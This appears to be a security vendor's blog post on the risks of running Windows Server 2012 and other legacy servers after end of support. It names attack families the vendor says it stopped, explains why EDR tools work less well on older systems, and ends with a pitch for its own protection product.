On October 2023, Microsoft Windows Server 2012 and 2012 R2 reached their end of life. Microsoft is ending free updates, bug fixes, and technical support to an operating system still used in hundreds of thousands of enterprise servers.
.jpeg?width=790&height=442&name=ezgif.com-resize(1).jpeg)
Microsoft allows customers to purchase Extended Security Updates (ESUs) until 2026. However, their core recommendation for Windows 2012 users is to migrate to the cloud with Azure or upgrade their on-prem servers to Windows Server 2022.
As we've covered in a previous blog post about legacy risks, business-critical servers are often either too operationally critical or create so many dependencies that upgrading or migrating them is effectively impossible.
The Windows 2012 end of support is no surprise. Microsoft follows a well-established product lifecycle and notifies of OS sunsetting years in advance. If an organization has not upgraded its Windows 2012 servers by now, it's likely not going to do so in the near future, either. So, what can they do instead?
The Legacy Server Landscape
Windows legacy servers are a growing source of risk.
Looking at market share data puts the percentage of servers running on an out-of-support Windows operating system (such as Windows 2008, 2008r2, 2012 and 2012 r2), at around 10% of all servers in use today.
There are hundreds of thousands of Windows legacy servers currently supporting critical functions - all of which have exploitable vulnerabilities. If you work in a manufacturing business, healthcare organization, financial institution, or any company that uses OT, your organization likely relies on servers powered by one or more of these legacy systems.
The risks legacy systems create are well known (we've written about how to protect Windows 7, 8, 8.1, and Windows Server 2008 R2). Still, it's worth noting that Windows 2012 adds over two and a half thousand known vulnerabilities (of which over 100 have been exploited) to the legacy risk register.
This list of attack vectors keeps growing. Between Q1 and Q3 2023, Windows 2012 had 23 published high-severity vulnerabilities.
Experience from past operating sunsets shows that exploit developers comb legacy codebases for exploitable bugs long after developers stop doing the same thing. Threat actors continue to scan and find exploitable legacy vulnerabilities in their target environments.
Proof of this is that – in recent months Morphisec prevented over 600 high-priority security incidents, compromising of over 40 distinct malware families on our client's Windows Legacy OS endpoints alone.
Attacks prevented by Morphisec on Windows Legacy –bypassed the installed EPP/EDRs
|
Attack Prevented |
Description |
Operating System |
|
Cobaltstrike Backdoor |
Cobaltstrike is a modular backdoor which frequently leads to domain propagation and exploitation to deploy attacks such as Ransomware and IP Theft. |
Windows 7 Windows Server 2008 Windows Server 2012 |
|
Metasploit Framework |
Metasploit framework is a very powerful tool which can be used by cybercriminals as well as ethical hackers to probe systematic vulnerabilities on networks and servers. |
Windows 7 Windows 8 Windows Server 2012 |
|
Gamarue Malware |
Gamarue is a malware family that downloads files to enable information theft from infected systems. Gamarue family worm variants can contaminate USB drives or portable hard drives that were connected to an infected system. |
Windows 7 |
|
Log4Shell Exploitation |
Exploitation of Log4Shell in Ubiquiti Unifi application. |
Windows Server 2012 |
|
Mimikatz Password Theft |
Mimikatz is a program that provides a set of tools for collecting and using Windows credentials on target systems. |
Windows 7 Windows Server 2012 |
|
ProxyShellMiner |
ProxyShellMiner is an advanced group of hackers that utilize ProxyShell exploits to spread a crypto miner. |
Windows 7 Windows Server 2008 Windows Server 2012 |
|
Squiblydoo Remote Code Execution |
Whitelisting bypass through regsvr32 and scrobj.dll - allows remote code execution. |
Windows 7 Windows Server 2008 Windows Server 2012 |
Source: Morphisec Threat Data
Legacy Servers Create Ransomware Risks
Legacy Windows OSs often feature in ransomware attack chains. Modern ransomware threat groups target legacy OSs to establish persistence and propagate attacks.
One of the most common Windows legacy server attacks that Morphisec stops on legacy servers involves Cobalt Strike. This modular backdoor tool was developed for pen testing but is now exploited by threat actors using cracked versions. Cobalt Strike often leads to domain propagation and exploitation as part of an attack chain that results in ransomware deployment and IP theft.
Critically, Cobalt Strike targets an endpoint's runtime memory. This makes it a particularly dangerous threat for servers running Windows Legacy OSs such as Server 2012, which are at an increased risk of exposure to fileless malware and threats exploiting runtime memory.
Cobalt Strike is a common feature in headline-making ransomware attacks like the Conti attack that disabled Ireland's health service in 2021.
Windows Legacy Server EDR Challenges
With such a high-risk profile, end of life Windows servers demand protection from ransomware and other threats.
Since legacy servers often host business critical processes, and due to their increased exposure, they must be protected by state-of-the-art endpoint protection solutions. Unfortunately, the Endpoint Detection and Response (EDR) technology you might use to protect other parts of your network is not fit for this task.
There are several reasons for the mismatch between EDR and Windows legacy servers.
On a more fundamental level, legacy systems are not an environment that EDRs are optimized for. Although you can install EDR agents on legacy servers, EDRs to be effective rely on software architecture that did not exist when the legacy servers OS themselves were launched. This severely impacts effectiveness of NGAV/EDR solutions.
Older legacy systems (i.e., anything running Windows 7 and 2008 R2) will only have a limited version of the Event Tracing for Windows (ETW). This means that an installed EDR won't be able to get as much real-time information as it would on a modern system. The result is less visibility and a lower detection rate for advanced thetas.
Any server running an OS older than Windows Server 2016 will also not have Microsoft's Anti-Malware Scanning Interface (AMSI). All modern EDRs use this technology to spot obfuscated and packed scripts, evasive macros, and most "living off the land" techniques.
Comparison of security features of Windows Server 2016, 2012 R2, 2008 R2
|
Security Capability |
Windows Server 2008 R2 |
Windows Server 2012 R2 |
Windows Server 2016 and above |
|
Shielded Virtual Machines |
|
|
|
|
Host Guardian Service: |
|
|
|
|
Anti-Malware Scanning Interface (AMSI) |
|
|
|
|
Event Tracing Windows (ETW) |
|
|
|
|
Just Enough Administration (JEA) |
|
|
|
|
Just-in-Time Administration (JIT) |
|
|
|
|
Credential Guard |
|
|
|
|
Remote Credential Guard |
|
|
|
|
Device Guard |
|
|
|
|
AppLocker |
|
|
|
|
Windows Defender |
|
|
|
|
Control Flow Guard |
|
|
|
|
Generation 2 virtual machines: |
|
|
|
|
Enhanced auditing for threat detection |
|
|
|
|
Dynamic Access Control |
|
|
|
|
Windows Firewall with Advanced Security |
|
|
|
|
BitLocker |
|
|
|
|
Small-footprint Hyper-V host (Server Core) |
|
|
|
Source: Microsoft: https://download.microsoft.com/download/0/D/4/0D4F30FD-59EF-454E-870C-B644B73438B4/WIndows_Server_2016_Feature_Comparison_Guide.pdf
Legend: Not Supported 
| Limited Support 
| Fully Supported 
Protect Legacy Servers with Morphisec
Morphisec's Automated Moving Target Defense (AMTD) technology uses an ultra-lightweight agent to block unauthorized processes on legacy Windows servers deterministically rather than probabilistically.
AMTD, which is championed by Gartner as "the future of cyber," bypasses the architectural challenges and limitations that legacy OS environments create for other security technologies to provide proactive protection against threats.
Protecting over 7,000 organizations and deployed at over nine million endpoints, including tens of thousands of legacy environments, Morphisec's AMTD technology prevents unauthorized code from executing, regardless of whether a recognizable signature or behavior pattern exists.
Request a demo today to see Morphisec AMTD in action.
.png?width=571&height=160&name=iso27001-(2).png)